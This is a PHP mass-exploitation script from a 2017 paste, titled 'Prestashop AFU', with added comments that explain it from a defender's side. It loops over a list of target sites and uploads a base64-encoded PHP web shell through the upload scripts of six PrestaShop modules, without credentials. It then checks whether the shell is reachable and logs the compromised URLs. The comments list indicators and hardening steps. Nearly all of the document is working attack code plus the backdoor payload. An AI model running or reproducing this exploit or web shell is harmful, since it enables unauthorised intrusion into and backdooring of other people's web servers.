AZZATSSINS_CYBERSERK

Prestashop AFU

Jun 9th, 2017
  1. <?php
     // Review summary (defensive reading of this paste):
     // - Renders a form whose textarea "azx" is split on "\r\n" into a list of sites.
     // - For every entry it writes a local file azx.php from the base64 blob below, then
     //   POSTs that file, with no cookies or credentials set on the request, to upload
     //   scripts of six PrestaShop modules and afterwards fetches the path where the
     //   upload would land.
     // - A response containing the marker AZZATSSINS is treated as success and the URL
     //   is appended to the local file azx.htm.
     // Indicators visible in this code: the file name azx.php under
     // /modules/<module>/slides/ or /modules/attributewizardpro/file_uploads/, the marker
     // string AZZATSSINS, and multipart POSTs with a field named "userfile" to
     // uploadimage.php / file_upload.php directly followed by a GET for azx.php.
     // General mitigation (standard hardening, not derived from this paste): remove or
     // update the listed modules, deny direct web access to their upload scripts, and
     // disable PHP execution in upload directories (unrestricted file upload, CWE-434).

     // Suppress all error output and remove the execution time limit.
  2. error_reporting(0);
  3. set_time_limit(0);
  4. ini_set('display_errors', 0);
     // Operator-facing form: textarea "azx" (site list) and submit button "anu".
  5. echo '<title>PRESTASHOP | UPLOAD</title><body bgcolor=silver><center><form method="post"><center><textarea name="azx"></textarea><br>
  6. <br><input name="anu" type="submit" value="Submit"></form></center><br><pre>';
     // Everything below runs only when the submit button value is present in the POST body.
  7. if($_POST['anu']){
  8. $ex=explode("\r\n",$_POST['azx']);
     // ASCII banner and a summary line shown to the operator.
  9. echo"
  10. \n   ___ ________  ___ ___________________  ______\n  / _ /_  /_  / / _ /_  __/ __/ __/  _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ //    /\ \  \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/  \n                                                \n";
  11. echo"\n Scan ".count($_POST['azx'])." website\n\n";
  12.  
  13.  
  14.  
  15. foreach($ex as $sites){
  16.     // Self backdoor creator
     // $azouz is base64 for a small PHP page. Decoded, it prints the marker AZZATSSINS and
     // a file-upload form when called without a file; when a file arrives in the multipart
     // field "azzatssins" it stores it under the client-supplied file name and echoes that
     // name. A copy of this page found on a server means anyone who can reach it can write
     // files there, so a hit should be handled as a compromise, not as a stray file.
  17.     $azouz = 'PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snYXp6YXRzc2lucyddWyduYW1lJ10pKXskbmFtZSA9ICRf
  18. RklMRVNbJ2F6emF0c3NpbnMnXVsnbmFtZSddOyRhenggPSAkX0ZJTEVTWydhenphdHNzaW5zJ11b
  19. J3RtcF9uYW1lJ107QG1vdmVfdXBsb2FkZWRfZmlsZSgkYXp4LCAkbmFtZSk7IGVjaG8gJG5hbWU7
  20. fWVsc2V7IGVjaG8gIkFaWkFUU1NJTlMgPGJyPjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVs
  21. dGlwYXJ0L2Zvcm0tZGF0YT48aW5wdXQgdHlwZT1maWxlIG5hbWU9YXp6YXRzc2lucz48aW5wdXQg
  22. dHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz4iOw==';
  23.  
     // The decoded page is written to azx.php next to this script on every loop iteration,
     // then its mode is set to octal 0044.
  24. $file = fopen("azx.php" ,"w+");
  25. $write = fwrite ($file ,base64_decode($azouz));
  26.  
  27. chmod("azx.php",0044);
  28.    echo " \nScaning > $sites";
  29.    $sites=trim($sites);
  30.    //////////// modules classes
     // Module 1 of 6: simpleslideshow. The POST carries a single multipart field,
     // "userfile", given in the legacy "@path" file-attachment notation; no cookie, header
     // or credential option is set on the handle. In access logs this appears as a POST to
     // uploadimage.php followed by a GET for slides/azx.php.
  31.     echo "\n\n       Testing Simpleslideshow";
  32.    $uploadfile="azx.php";
  33.    $url = "/modules/simpleslideshow/uploadimage.php";
  34.    $url2 = "/modules/simpleslideshow/slides/azx.php";
  35.    $ch = curl_init("$sites.$url");
  36.    curl_setopt($ch, CURLOPT_POST, true);
  37.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile"));
  38.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  39.     $postResult = curl_exec($ch);
  40.    curl_close($ch);
     // Verification: fetch the expected upload location (errors silenced with @) and look
     // for the marker string; $postResult from the upload itself is never inspected.
  41.  $get1=@file_get_contents($sites.$url2);
  42.     if(preg_match('#AZZATSSINS#',$get1)){
  43.     echo "\n\t $sites$url2";
     // Successful URLs are appended to the local results file azx.htm.
  44.     $f = fopen("azx.htm","a+");
  45.         fwrite ($f,$sites.$url2."<br>");
  46.         fclose($f);
  47.         } else {
  48.         echo "\n\t Fail ";
  49.    
  50. }
  51.   ////////////
     // Module 2 of 6: productpageadverts. Same sequence: POST "userfile" to
     // uploadimage.php, GET slides/azx.php, match the marker, log to azx.htm.
  52.     echo "\n       Testing Productpageadverts";
  53.    $uploadfile2="azx.php";
  54.    $url3 = "/modules/productpageadverts/uploadimage.php";
  55.    $url24 = "/modules/productpageadverts/slides/azx.php";
  56.    $ch = curl_init("$sites.$url3");
  57.    curl_setopt($ch, CURLOPT_POST, true);
  58.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2"));
  59.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  60.     $postResult = curl_exec($ch);
  61.     curl_close($ch);
  62.  $get12=@file_get_contents($sites.$url24);
  63.     if(preg_match('#AZZATSSINS#',$get12)){
  64.     echo "\n\t $sites$url24";
  65.     $f = fopen("azx.htm","a+");
  66.         fwrite ($f,$sites.$url24."<br>");
  67.         fclose($f);
  68.         } else {
  69.         echo "\n\t Fail";
  70.    
  71. }
  72.    ////////////
     // Module 3 of 6: columnadverts. Same sequence against uploadimage.php and
     // slides/azx.php.
  73.     echo "\n       Testing Columnadverts";
  74.    $uploadfile23="azx.php";
  75.    $url34 = "/modules/columnadverts/uploadimage.php";
  76.    $url245 = "/modules/columnadverts/slides/azx.php";
  77.    $ch = curl_init("$sites.$url34");
  78.    curl_setopt($ch, CURLOPT_POST, true);
  79.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile23"));
  80.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  81.     $postResult = curl_exec($ch);
  82.     curl_close($ch);
  83.  $get123=@file_get_contents($sites.$url245);
  84.     if(preg_match('#AZZATSSINS#',$get123)){
  85.     echo "\n\t $sites$url245";
  86.     $f = fopen("azx.htm","a+");
  87.         fwrite ($f,$sites.$url245."<br>");
  88.         fclose($f);
  89.         } else {
  90.         echo "\n\t Fail";  
  91. }
  92.   ////////////
     // Module 4 of 6: homepageadvertise. Same sequence against uploadimage.php and
     // slides/azx.php.
  93.       echo "\n       Testing Homepageadvertise";
  94.    $uploadfile234="azx.php";
  95.    $url345 = "/modules/homepageadvertise/uploadimage.php";
  96.    $url2456 = "/modules/homepageadvertise/slides/azx.php";
  97.    $ch = curl_init("$sites.$url345");
  98.    curl_setopt($ch, CURLOPT_POST, true);
  99.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile234"));
  100.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  101.     $postResult = curl_exec($ch);
  102.     curl_close($ch);
  103.  $get124=@file_get_contents($sites.$url2456);
  104.     if(preg_match('#AZZATSSINS#',$get124)){
  105.     echo "\n\t $sites$url2456";
  106.         $f = fopen("azx.htm","a+");
  107.         fwrite ($f,$sites.$url2456."<br>");
  108.         fclose($f);
  109.         } else {
  110.         echo "\n\t Fail";  
  111. }
  112.   //////////
     // Module 5 of 6: attributewizardpro. The paths differ from the other five: the upload
     // script is file_upload.php and the checked location is file_uploads/azx.php.
  113.       echo "\n       Testing Attributewizardpro";
  114.    $uploadfile2345="azx.php";
  115.    $url3456 = "/modules/attributewizardpro/file_upload.php";
  116.    $url24567 = "/modules/attributewizardpro/file_uploads/azx.php";
  117.    $ch = curl_init("$sites.$url3456");
  118.    curl_setopt($ch, CURLOPT_POST, true);
  119.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2345"));
  120.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  121.     $postResult = curl_exec($ch);
  122.     curl_close($ch);
  123.  $get125=@file_get_contents($sites.$url24567);
  124.     if(preg_match('#AZZATSSINS#',$get125)){
  125.     echo "\n\t $sites$url24567";
  126.         $f = fopen("azx.htm","a+");
  127.         fwrite ($f,$sites.$url24567."<br>");
  128.         fclose($f);
  129.         } else {
  130.         echo "\n\t Fail";  
  131. }
  132.  ///////////
     // Module 6 of 6: vtemslideshow. Same sequence against uploadimage.php and
     // slides/azx.php.
  133.      echo "\n       Testing Vtemslideshow";
  134.    $uploadfile2349="azx.php";
  135.    $url3450 = "/modules/vtemslideshow/uploadimage.php";
  136.    $url24560 = "/modules/vtemslideshow/slides/azx.php";
  137.    $ch = curl_init("$sites.$url3450");
  138.    curl_setopt($ch, CURLOPT_POST, true);
  139.    curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2349"));
  140.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  141.     $postResult = curl_exec($ch);
  142.     curl_close($ch);
  143.  $get1276=@file_get_contents($sites.$url24560);
  144.     if(preg_match('#AZZATSSINS#',$get1276)){
  145.     echo "\n\t $sites$url24560";
  146.             $f = fopen("azx.htm","a+");
  147.         fwrite ($f,$sites.$url24560."<br>");
  148.         fclose($f);
  149.         } else {
  150.         echo "\n\t Fail \n";  
     // The two braces below close the last else branch and the foreach; the final brace
     // closes the if on the submit button.
  151. } }
  152. }
  153. ?>